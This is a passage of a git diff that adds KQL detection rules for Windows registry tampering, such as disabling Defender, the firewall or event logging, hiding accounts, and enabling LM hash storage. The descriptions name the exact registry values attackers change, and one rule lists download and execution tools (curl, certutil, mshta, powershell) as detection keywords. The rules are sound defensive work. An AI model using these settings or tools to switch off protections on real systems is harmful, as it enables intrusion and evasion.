+// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrator actions via the Windows Defender interface
+//   - Third party Antivirus
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and (not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
new file mode 100644
index 00000000..8a8e498c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_event_logging_via_registry.kql
@@ -0,0 +1,12 @@
+// Title: Disable Windows Event Logging Via Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-04
+// Level: high
+// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+//   - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
new file mode 100644
index 00000000..f6313dff
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_firewall_by_registry.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows Firewall by Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set EnableFirewall to 0 to disable the Windows firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
new file mode 100644
index 00000000..a925bbff
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
new file mode 100644
index 00000000..02500d53
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disabled_windows_defender_eventlog.kql
@@ -0,0 +1,12 @@
+// Title: Disabled Windows Defender Eventlog
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-04
+// Level: high
+// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
new file mode 100644
index 00000000..bdd3ff47
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/displaying_hidden_files_feature_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Displaying Hidden Files Feature Disabled
+// Author: frack113
+// Date: 2022-04-02
+// Level: medium
+// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
+// This technique is abused by several malware families to hide their files from normal users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
new file mode 100644
index 00000000..941e415c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/dns_over_https_enabled_by_registry.kql
@@ -0,0 +1,14 @@
+// Title: DNS-over-HTTPS Enabled by Registry
+// Author: Austin Songer
+// Date: 2021-07-22
+// Level: medium
+// Description: Detects when a user enables DNS-over-HTTPS.
+// This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
new file mode 100644
index 00000000..65d774ac
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/driver_added_to_disallowed_images_in_hvci_registry.kql
@@ -0,0 +1,12 @@
+// Title: Driver Added To Disallowed Images In HVCI - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)
+// Date: 2023-12-05
+// Level: high
+// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
new file mode 100644
index 00000000..92e70a89
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_lm_hash_storage.kql
@@ -0,0 +1,11 @@
+// Title: Enable LM Hash Storage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
new file mode 100644
index 00000000..5ce08bb7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_local_manifest_installation_with_winget.kql
@@ -0,0 +1,12 @@
+// Title: Enable Local Manifest Installation With Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence
+// False Positives:
+//   - Administrators or developers might enable this for testing purposes or to install custom private packages
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
new file mode 100644
index 00000000..9f357ea4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enable_microsoft_dynamic_data_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Enable Microsoft Dynamic Data Exchange
+// Author: frack113
+// Date: 2022-02-26
+// Level: medium
+// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.002
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
new file mode 100644
index 00000000..09982deb
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/enabling_cor_profiler_environment_variables.kql
@@ -0,0 +1,10 @@
+// Title: Enabling COR Profiler Environment Variables
+// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
+// Date: 2020-09-10
+// Level: medium
+// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
new file mode 100644
index 00000000..0e260f96
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_rpcrt4_dll.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For rpcrt4.dll
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
new file mode 100644
index 00000000..854243f6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_for_scm.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled For SCM
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
new file mode 100644
index 00000000..e785f6eb
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/etw_logging_disabled_in_net_processes_sysmon_registry.kql
@@ -0,0 +1,10 @@
+// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-05
+// Level: high
+// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
new file mode 100644
index 00000000..8cb98ccc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/execution_dll_of_choice_using_wab_exe.kql
@@ -0,0 +1,10 @@
+// Title: Execution DLL of Choice Using WAB.EXE
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-13
+// Level: high
+// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
new file mode 100644
index 00000000..7b4053da
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql
@@ -0,0 +1,10 @@
+// Title: FileFix - Command Evidence in TypedPaths
+// Author: Alfie Champion (delivr.to), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-05
+// Level: high
+// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "#" and RegistryValueData contains "http") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identification" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "finger" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains "regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
new file mode 100644
index 00000000..d34e214f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hide_schedule_task_via_index_value_tamper.kql
@@ -0,0 +1,13 @@
+// Title: Hide Schedule Task Via Index Value Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects when the "index" value of a scheduled task is modified from the registry
+// Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
new file mode 100644
index 00000000..f5eca91e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hiding_user_account_via_specialaccounts_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-07-12
+// Level: high
+// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
new file mode 100644
index 00000000..24dd96b5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_code_integrity_disabled.kql
@@ -0,0 +1,10 @@
+// Title: Hypervisor Enforced Code Integrity Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2023-03-14
+// Level: high
+// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled" or RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
new file mode 100644
index 00000000..7db4db68
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/hypervisor_enforced_paging_translation_disabled.kql
@@ -0,0 +1,10 @@
+// Title: Hypervisor Enforced Paging Translation Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-05
+// Level: high
+// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
new file mode 100644
index 00000000..e517c9d5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/ie_change_domain_zone.kql
@@ -0,0 +1,12 @@
+// Title: IE Change Domain Zone
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+//   - Administrative scripts
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
new file mode 100644
index 00000000..c0dc15c6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
@@ -0,0 +1,10 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
+// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
new file mode 100644
index 00000000..9a64e30d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/internet_explorer_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Internet Explorer Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
new file mode 100644
index 00000000..c7a3d5df
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/internet_explorer_disablefirstruncustomize_enabled.kql
@@ -0,0 +1,12 @@
+// Title: Internet Explorer DisableFirstRunCustomize Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - As this is controlled by group policy as well as user settings. Some false positives may occur.
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe")))) and (not(((RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath contains "\\Temp\\" and InitiatingProcessFolderPath contains "\\.cr\\avira_")) or (RegistryValueData contains "DWORD (0x00000001)" and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe", "C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
new file mode 100644
index 00000000..cd2f98f8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql
@@ -0,0 +1,11 @@
+// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
+// Author: frack113
+// Date: 2022-05-28
